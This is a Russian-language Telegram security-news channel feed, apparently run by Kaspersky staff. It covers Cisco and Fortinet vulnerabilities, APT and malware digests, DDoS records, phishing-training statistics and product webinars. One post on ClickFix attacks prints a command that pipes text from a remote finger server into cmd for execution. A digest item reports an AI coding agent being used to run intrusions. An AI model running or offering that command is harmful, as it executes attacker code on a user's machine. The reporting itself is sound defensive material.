Два критических бага в устройствах Cisco ASA и Firepower, отслеживаемые как CVE-2025-20362 и CVE-2025-20333, продолжают активно эксплуатироваться, сообщает CISA в обновлённом предписании, настоятельно призывая организации немедленно установить исправления.
Во многих компаниях думают, что уже установили патч, устраняющий эти дефекты. Проблема в том, что это две разные версии обновления. Поэтому даже в некоторых организациях с устоявшимся патч-менеджментом устройства остаются уязвимыми. Согласно данным ShadowServer, в сети видны более 30000 уязвимых устройств.
Оба дефекта были устранены в октябре. Один позволяет обойти аутентификацию, а второй — выполнить произвольный код на устройстве, потенциально получая полный контроль над агрегатами Cisco. Пара уязвимостей эксплуатировалась до патчинга как 0day, нацеленный на устройства Cisco 5500-X Series с включёнными сервисами VPN. Cisco связывает атаки с кампанией ArcaneDoor.
Обновлённые рекомендации по установке патчей с минимально необходимыми номерами версий ASA и Firepower доступны здесь.
#Cisco #уязвимости @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥2👏2🤣2
В конце лета и начале осени проходят крупные конференции, и сейчас наконец начинают публиковаться записи докладов. Просмотром легко занять все выходные:
Have fun!
#видео @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥4❤1👏1
🗣 Инновации SD-WAN: репортаж с производства 👷
Организации переходят на SD-WAN, чтобы одновременно повысить отказоустойчивость, безопасность и экономическую эффективность своей сетевой инфраструктуры.
Но не стоит забывать про удобство и эффективность работы сетевых инженеров — то, что в итоге и даёт компании все эти преимущества. В свежей версии Kaspersky SD-WAN 2.5 внедрили целый пакет удобств и новшеств:
▶️ диагностика BGP и OSPF через GUI оркестратора;
▶️ выборочная переадресация DNS-запросов по заданным условиям;
▶️ изменения в конфигурации CPE по расписанию (🔥!!!);
▶️ замена CPE c сохранением настроек и многое другое.
А ещё у нас новый модельный ряд в составе ПАК с поддержкой ГОСТ-шифрования!
Хотите узнать подробности, план развития на 2026 год или задать практический вопрос?
Приходите на онлайн-стрим в следующий вторник, 18 ноября 2025 в 11:00 (МСК). Он будет необычным – вы увидите прямой репортаж от команды, разрабатывающий все эти функции для вас.
Зарезервировать место на стриме⟶
#события @П2Т
Организации переходят на SD-WAN, чтобы одновременно повысить отказоустойчивость, безопасность и экономическую эффективность своей сетевой инфраструктуры.
Но не стоит забывать про удобство и эффективность работы сетевых инженеров — то, что в итоге и даёт компании все эти преимущества. В свежей версии Kaspersky SD-WAN 2.5 внедрили целый пакет удобств и новшеств:
А ещё у нас новый модельный ряд в составе ПАК с поддержкой ГОСТ-шифрования!
Хотите узнать подробности, план развития на 2026 год или задать практический вопрос?
Приходите на онлайн-стрим в следующий вторник, 18 ноября 2025 в 11:00 (МСК). Он будет необычным – вы увидите прямой репортаж от команды, разрабатывающий все эти функции для вас.
Зарезервировать место на стриме⟶
#события @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8💯6❤1🔥1
Forwarded from Kaspersky
Решение соответствует требованиям к многофункциональным межсетевым экранам уровня сети по 4 классу защиты.
Также Kaspersky NGFW присвоен четвёртый уровень доверия, а значит он может использоваться для защиты значимых объектов КИИ, государственных информационных систем, АСУ ТП и информационных систем персональных данных.
Cертификат распространяется на все ПАКи в рамках модельного ряда Kaspersky NGFW — испытания успешно прошла вся линейка Kaspersky Extension: KX-3500, KX-1000, KX-400 и KX-100.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👏4❤3💩2
Атаки Red Likho, хайп вокруг ИИ-APT и другие интересные исследования ИБ за неделю
🟣 Новые TTPs группы Red Likho, применяющей бэкдор GoRed в атаках на российских разработчиков ПО. Это сложное ВПО поддерживает режимы маяка, прокси-сервера и обратной оболочки, а для связи с С2 использует протоколы DNS, ICMP, QUIC и WSS. Инструментарий атакующих частично пересекается с арсеналом BO Team, подтверждая тесное сотрудничество групп в этом кластере угроз
🟣 Технический анализ инструмента повышения привилегий, применяемого группировкой. Эксплуатируются дефекты конфигурации Bitrix CMS.
🟠 Одним из самых резонансных исследований ИБ за неделю стал отчёт Anthropic об атаках некой китаеязычной APT на десятки организаций, в которых агентские возможности Claude code позволили провести 80-90% работ автономно. По заявлению исследователей, ИИ мог провести самостоятельное сканирование инфраструктуры, поиск уязвимых точек, разработку плана атаки, а после одобрения оператором — взломать сеть, захватить дополнительные хосты и извлечь ценные данные.
Эксперты уже раскритиковали отчёт за отсутствие IoC, подробностей о том, на каких этапах модель ошибалась и галлюцинировала, и других деталей, важных защитникам. Также непонятно, зачем атаки, предположительно мотивированные шпионажем за американскими компаниями, проводить с применением облачного американского ИИ-сервиса, в котором вероятность их обнаружения максимальна.
🟢 Подробный разбор вредоносной спам-кампании IndonesianFoods, буквально утопившей реестр npm в бессмысленных библиотеках. Всего опубликовано более 43000 библиотек, которые не выполняют вредоносных действий кроме самораспространения. Вероятно, цель всего упражнения — заработок токенов TEA, которые являются криптовалютной наградой за вклад в open source 🤦♂️.
🔴 Fortinet втихую запатчили CVE-2025-64446 (CVSS 9.1), уязвимость обхода пути в FortiWeb. Патч 8.0.2 вышел 28 октября, когда дефект уже массово эксплуатировался для создания административных аккаунтов на устройствах, доступных из Интернета. Но бюллетень и собственно номер CVE появились только в пятницу, 14 ноября.
🔵 Анализ банковских троянцев Coyote и Maverick продемонстрировал их связь, а также новые стратегии атакующих, в частности, целевые атаки на гостиничный бизнес.
🟢 А группа Payroll Pirates проводит целевые фишинговые атаки на пользователей систем расчёта зарплаты, трейдинговых платформ и других финансовых систем. Предположительно в группу вошли 4 ранее изолированных кластера угроз.
🔵 Разбор инфостилера Novastealer, выполненного в виде пачки скриптов для MacOS и нацеленного на кражу криптвалюты.
⚪️ Технический анализ нового шифровальщика Yurei, написанного на Go.
🟢 Операция европейских полицейских накрыла инфраструктуру инфостилера Rhadamanthys, а также ботнета Elysium и троянца VenomRAT. Всего изъято 1025 серверов в 11 разных местах.
#дайджест @П2Т
Эксперты уже раскритиковали отчёт за отсутствие IoC, подробностей о том, на каких этапах модель ошибалась и галлюцинировала, и других деталей, важных защитникам. Также непонятно, зачем атаки, предположительно мотивированные шпионажем за американскими компаниями, проводить с применением облачного американского ИИ-сервиса, в котором вероятность их обнаружения максимальна.
#дайджест @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
Securelist
Red Likho атакует цепочки поставок бэкдором GoRed
Разбираем недавнюю кампанию бэкдора GoRed: новые цели, TTP, C2-серверы, связь с BO Team, ориентированность злоумышленников на цепочку поставок.
👍5🔥5❤3
ЦСР опубликовал прогноз развития ИБ-рынка РФ на 2025-2030 годы. Невзирая на сложный макроэкономический фон, в 2024 году рынок вырос на 26,3%, до 314 млрд руб. К 2030 году прочат рост до 968 млрд (CAGR около 21%).
Доля СЗИ в объёме рынка составляет 73,1%, услуги — 26,9%, их доля выросла на 0,4 п.п, в основном благодаря резкому росту спроса на ИБ-аутсорсинг (MSSP/MDR). Опережающий рост показывают bug bounty и кибериспытания (red team). Среди производителей СЗИ лидером названа «Лаборатория Касперского». Лидирующими категориями на рынке СЗИ остаются network security, endpoint security и infrastructure security.
Технологические тренды:
#статистика @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍4❤2👏2💯2
Просто Cloudflare глобально прилёг.
Вчера только объявили о покупке Replicate, и сразу на тебе.
@П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8🤯4👏2
В среднем 40% сотрудников переходят по подозрительным ссылкам, но это число повышается до 66,5%, если письмо посвящено расчёту премий. Такова печальная статистика анализа тренировочных фишинговых рассылок, который совместно провели специалисты «Лаборатории Касперского» и МегаФона. Также (зря) вызывают доверие оповещения о смене паролей и нарушении корпоративных политик.
Попав на мутную фишинговую страницу, каждый четвёртый адресат (10% от всех протестированных сотрудников) вводит конфиденциальные данные, а 9% открывают вложения, которые в реальных кибератаках были бы вредоносными.
Наибольшее доверие у сотрудников вызывают письма якобы от HR-, финансового и ИТ-отделов.
Только систематическое обучение зримо улучшает ситуацию. Среди прошедших тренинги лишь 7% открывают подозрительные письма, 2% переходят по сомнительным ссылкам и 0,2% вводят данные на целевой странице — то есть показатель успеха гипотетической атаки снижается в 190 раз.
Бизнесы начинают понимать это, поэтому 95 % корпоративных клиентов ежегодно повторяют учебные мероприятия. Кроме регулярного обучения и тренингов, важно адаптировать программу и список тем к должности и риск-профилю сотрудника.
Чтобы реализовать такой систематический подход, оцените возможности Kaspersky Automated Security Awareness Platform.
#советы @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥5❤3
Общедоступное оптоволокно и изобилие IoT подпитывают гонку вооружений DDoS. Microsoft поделилась информацией об очередном рекордном инциденте, в котором единичный endpoint Azure в Австралии стал мишенью DDoS на 15,72 Тб/с и 3,64 млрд пакетов в секунду. Атака состояли из UDP flood с полумиллиона IP. Azure, к его чести, выдержал, сервисы продолжали работать.
Источником атаки назван быстрорастущий ботнет Aisuru, который относят к классу Turbo-Mirai
Ранее тот же ботнет провёл рекордную блиц-атаку, отражённую Cloudflare (22,2 Тб/с).
Но возможности Aisuru в будущем может опередить быстрорастущий конкурент RondoDox. Обнаруженный лишь в июле, он растёт экспоненциально и сочетает несколько примечательных свойств:
В преддверии праздников и распродаж всем онлайн-сервисам необходимо перепроверить, что они адекватно защищены против DDoS-атак нового уровня. Стоит обсудить со своим поставщиком DDoS-защиты проведение учений, чтобы заранее обнаружить и устранить любые проблемы в инфраструктуре.
#угрозы @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤1🔥1👏1🤯1
В Cyber Risk Alliance не поленились выпустить целую брошюру о том, что сотрудникам SOC и ИБ в целом нужно отдыхать.
По статистике треть ИБ-специалистов отмечает снижение эффективности и внимательности в четвёртом квартале, а 68% не могут отключиться от работы, даже если берут отпуск на длинные праздники.
Мы не удивлены: больше людей болеют и в отпусках, сотрудники компании чаще попадаются на всякий фишинг и совершают другие ошибки, на оставшихся специалистов SOC валится больше работы. Чтобы специалисты не выгорали, предлагается простая трёхходовочка:
За рамками этой схемы также говорят о важном — во многих компаниях по-прежнему есть «культура героизма», где переработки и постоянное присутствие на связи поощряются. В долгосрочном периоде это приводит к истощению ИБ-спецов и ошибкам в работе.
В брошюре отсутствуют практические пошаговые рекомендации, но их можно найти у нас в канале: вот советы по графику дежурств SOC, а вот конкретные примеры того, как в нашей SIEM ИИ реально снижает нагрузку и упрощает работу аналитиков.
#советы @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5👍2🔥2💯2👏1
📡 Если вы пользуетесь Интернетом в самолёте, весьма вероятно, что ваш трафик буквально вещают на полмира без всякого шифрования. Поэтому шифрование обязательно добавлять своими силами.
🕵️♂️ Европейские СМИ провели исследование практик брокеров данных, приводящих к сбору информации о европейцах, включая госслужащих и военных. Как мы прекрасно понимаем, ничего хорошего они не нашли — изобилие данных позволяет осуществлять целевой шпионаж и подрывать национальную безопасность. Борьба с ADINT (advertising based intelligence) только начинается.
#дайджест @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥5👏3😍2❤1
🐈⬛ Разбор обновлённого инструментария APT ToddyCat, преимущественно используемого для похищения почтовой переписки целевых компаний. Примечателен инструмент TCSectorCopy, специально разработанный для похищения данных из открытых и заблокированных процессом Outlook файлов .ost.
#APT #дайджест @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
Securelist
Ботнет Tsundere заражает устройства, используя особенности блокчейна Ethereum
Эксперты GReAT «Лаборатории Касперского» обнаружили новую кампанию с ботнетом Tsundere. Боты на Node.js используют смарт-контракты Web3 и распространяются через MSI-установщики и PowerShell-скрипты.
👏4🔥3👍2❤1
This media is not supported in your browser
VIEW IN TELEGRAM
Эксперты «Лаборатории Касперского» начали подводить итоги года — в этом году ключевые тенденции, значимые события и прогнозы на 2026 сгруппированы по отраслям.
Начнём с финансовой отрасли.
Злоумышленники освоили атаки на цепочку поставок, где компрометация подрядчиков иногда приводила к последствиям даже для национальных платёжных систем (злоупотребление системой PIX в Бразилии).
Преступные группы всё чаще совмещают физические и цифровые методы для повышения эффективности мошенничества, например подкупают инсайдеров в атакуемой компании. В целом киберпреступность и традиционная организованная преступность постепенно сливаются.
#статистика @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤4🔥2💩1
Решения XDR продолжают развиваться, следуя требованиям практиков ИБ, изменению ландшафта киберугроз и развитию законодательства. Эволюционирует всё: от более широкого применения автоматизации и LLM и обработки новых видов телеметрии до популяризации открытой архитектуры и уточнения места XDR в общей архитектуре ИБ.
Как это происходит в России, какие возможности появляются у отечественного бизнеса и что предлагает Kaspersky Symphony XDR — расскажем на онлайн-стриме в ближайший четверг! Обсудим:
Встречаемся в этот четверг: 27 ноября 2025 в 11:00 (МСК).
Нужна предварительная регистрация.
Зарезервировать место на вебинаре ⟶
#события @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥4🤩1💩1
Атакующие откопали finger 👉👈
В атаках ClickFix отмечено использование finger — древнего и экзотического протокола идентификации пользователей по сети, который по странной причуде Microsoft по-прежнему поддерживается всеми версиями Windows.
В норме Finger-сервер сообщает имя, email и другие данные о запрошенном пользователе системы, включая время его последнего входа в систему. Из-за проблем конфиденциальности использование Finger практически прекратилось ещё в конце прошлого века, но его поддерживают современные ОС. Правда, сервер по умолчанию не запущен.
Злоумышленники запускают общедоступный сервер Finger, а затем эксплуатируют интересную особенность протокола — в дополнение к имени, email и прочему, сервер способен возвращать произвольный текст, который пользователь поместил в файлы .project and .plan — этакий аналог статусов в календаре и твиттера, но родом из семидесятых. Ну а в 2025 в файл .plan кладут скрипт командной строки, а дальше показывают пользователю фальшивую капчу, которая просит запустить относительно невинного вида конструкцию наподобие
Если жертва выполнит это действие, переданный сервером Finger текст будет запущен как скрипт и отработает на машине жертвы с понятными последствиями.
Предотвратить эксплуатацию техники можно, заблокировав стандартный порт 79, или заблокировав выполнение файла finger.exe. Благо, легитимных случаев использования finger в природе почти не встречается.
Кстати, пока занимаетесь экзотическими ретро-протоколами, обдумайте возможность заблокировать заодно и предшественника HTTP, протокол Gopher, который (если запущен) работает на порту 70 и может быть использован в атаках SSRF для обхода фильтров, разведки и эксфильтрации данных из внутренней сети.
#угрозы @П2Т
В атаках ClickFix отмечено использование finger — древнего и экзотического протокола идентификации пользователей по сети, который по странной причуде Microsoft по-прежнему поддерживается всеми версиями Windows.
В норме Finger-сервер сообщает имя, email и другие данные о запрошенном пользователе системы, включая время его последнего входа в систему. Из-за проблем конфиденциальности использование Finger практически прекратилось ещё в конце прошлого века, но его поддерживают современные ОС. Правда, сервер по умолчанию не запущен.
Злоумышленники запускают общедоступный сервер Finger, а затем эксплуатируют интересную особенность протокола — в дополнение к имени, email и прочему, сервер способен возвращать произвольный текст, который пользователь поместил в файлы .project and .plan — этакий аналог статусов в календаре и твиттера, но родом из семидесятых. Ну а в 2025 в файл .plan кладут скрипт командной строки, а дальше показывают пользователю фальшивую капчу, которая просит запустить относительно невинного вида конструкцию наподобие
cmd /c "finger user@host | cmd"
Если жертва выполнит это действие, переданный сервером Finger текст будет запущен как скрипт и отработает на машине жертвы с понятными последствиями.
Предотвратить эксплуатацию техники можно, заблокировав стандартный порт 79, или заблокировав выполнение файла finger.exe. Благо, легитимных случаев использования finger в природе почти не встречается.
Кстати, пока занимаетесь экзотическими ретро-протоколами, обдумайте возможность заблокировать заодно и предшественника HTTP, протокол Gopher, который (если запущен) работает на порту 70 и может быть использован в атаках SSRF для обхода фильтров, разведки и эксфильтрации данных из внутренней сети.
#угрозы @П2Т
🔥8❤5👍5🤣4👏3🤔1
Cloud Threat Modeling v2.0 20251028.pdf
7.2 MB
Cloud Security Alliance обновили своё руководство по моделированию облачных угроз, впервые выпущенное в 2021 году. Документ не является готовым фреймворком. Он даёт рекомендации по выбору подхода к моделированию, содержит обзор имеющихся фреймворков, а главное — подчёркивает аспекты, которые должны быть учтены в выбранном фреймворке и наборе инструментов, чтобы адекватно отразить реалии облачной инфраструктуры. Ведь не каждый инструмент моделирования позволяет адекватно учесть serverless-нагрузки, гибридные облака и одновременное использование нескольких облачных провайдеров, разделение ответственности за ИБ; далеко не все адекватно интегрированы с CSMP и IAM, или способны проанализировать конфигурацию инфраструктуры на базе данных IaC.
Обновления руководства по сравнению с версией 2021 года значительны. Самое крупное — отражены реалии проникновения ИИ в организации и влияние ИИ на безопасность облаков. Также предложены современные инструменты для автоматизации моделирования.
Документ не теоретический — почти по всем темам предложены пошаговые меры и даже метрики, позволяющие итеративно улучшать модель по мере развития организации.
В первую очередь руководство предназначено для архитекторов облачных систем, аналитиков угроз, разработчиков и DevSecOps, а также специалистов по оценке рисков.
#советы @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤3🔥1💯1
В ноябре был Cloudflare и много разных новостей ИБ, поэтому среди них могли затеряться материалы, полезные долгосрочно. Мы собрали самое ценное за месяц — эти статьи помогут выстроить эффективные процессы и системы в ИБ.
Если что-то пропустили, на выходных как раз можно наверстать упущенное!
#дайджест @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍3🔥3🤣2
Когда: 3 декабря 2025 в 11:00 (МСК)
Повышение требований к ИБ, дефицит кадров и бюджетные ограничения побуждают бизнес переходить от закупки «набора коробок» к внедрению платформ и экосистем. Экосистемный подход обещает меньше проблем с интеграцией, единые плейбуки и измеримый эффект (MTTD/MTTR, доступность, простои), но усиливает опасения избыточной зависимости от одного производителя, venor lock-in.
Есть ли тут золотая середина? Можно ли извлечь выгоды экосистемности, при этом снизив риски зависимости? Как внедрять экосистемные решения, оценивать результат, как планировать сценарий возможной смены поставщика?
Об этом эксперты разных секторов ИБ-индустрии поговорят на онлайн-конференции AM-Live! Обсудим:
Встречаемся в среду: 3 декабря 2025
Нужна предварительная регистрация.
Узнать о конференции и зарегистрироваться ⟶
#события @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥4😍3❤2
#APT #дайджест П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
Securelist
Новые инструменты и методы Tomiris: реверс-шеллы, Havoc и AdaptixC2
Разбираем новые инструменты и методы APT-группы Tomiris: реверс-шеллы на разных языках программирования, открытые фреймворки Havoc и AdaptixC2, а также каналы связи через Discord и Telegram.
❤7🔥5👍4
Закрытый в рамках октябрьского Patch Tuesday дефект CVE-2025-59287 (CVSS 9.8) в Windows Server Update Service, приводящий к выполнению произвольного кода, надолго запомнится чередой неэффективных патчей, которые к тому же нарушали нормальный цикл обновлений на уязвимых серверах. Уязвимостью уже вооружились злоумышленники, поэтому её устранение критически важно.
Грамотная архитектура ИБ позволяет организациям защититься от эксплуатации этого и подобных дефектов. В новой статье разобрали, как обнаруживают уязвимость и предотвращают её эксплуатацию различные наши решения: EPP, EDR, KATA/NDR и NGFW. Тем, кто предпочитает один раз увидеть — короткое видео с участием NGFW. Межсетевой экран предотвращает отправку эксплойта на уязвимый сервер и фиксирует факт атаки.
#видео #NGFW #Microsoft @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
RUTUBE
Как Kaspersky NGFW блокирует и детектирует эксплуатацию CVE-2025-59287 в WSUS
Блокировка использования уязвимости CVE-2025-59287 в Windows Server Update Services при помощи Kaspersky NGFW и отображение попытки использования этой уязвимости в логах Open Single Management Platform.
00:14 Подключение к Windows Server
00:31 Проверка доступности…
00:14 Подключение к Windows Server
00:31 Проверка доступности…
🔥6👍5👏3❤1
Forwarded from Kaspersky
👨💻 Слепая зона корпоративной ИБ: чем опасны расширения браузера
Корпоративные сервисы всё чаще работают через браузер, и этим активно пользуются злоумышленники. Их главным инструментом становятся вредоносные расширения, которые, среди прочего, позволяют похищать конфиденциальную информацию, перехватывать учётные записи сотрудников и красть криптовалюту.
Действия расширений сложно обнаружить: они практически неотличимы от активности пользователя в браузере. Для эффективной борьбы с угрозой компаниям необходимо выработать систематический подход, а также комбинировать инструменты управления ИБ-политикой с сервисами для анализа расширений.
На конференции Security Analyst Summit 2025 исследователь кибербезопасности Афанасиос Гиатсос рассказал, как защитить сотрудников от вредоносных расширений браузера. Основные выводы и практические рекомендации мы собрали в нашем посте.
Корпоративные сервисы всё чаще работают через браузер, и этим активно пользуются злоумышленники. Их главным инструментом становятся вредоносные расширения, которые, среди прочего, позволяют похищать конфиденциальную информацию, перехватывать учётные записи сотрудников и красть криптовалюту.
Действия расширений сложно обнаружить: они практически неотличимы от активности пользователя в браузере. Для эффективной борьбы с угрозой компаниям необходимо выработать систематический подход, а также комбинировать инструменты управления ИБ-политикой с сервисами для анализа расширений.
На конференции Security Analyst Summit 2025 исследователь кибербезопасности Афанасиос Гиатсос рассказал, как защитить сотрудников от вредоносных расширений браузера. Основные выводы и практические рекомендации мы собрали в нашем посте.
👍4🔥4👏3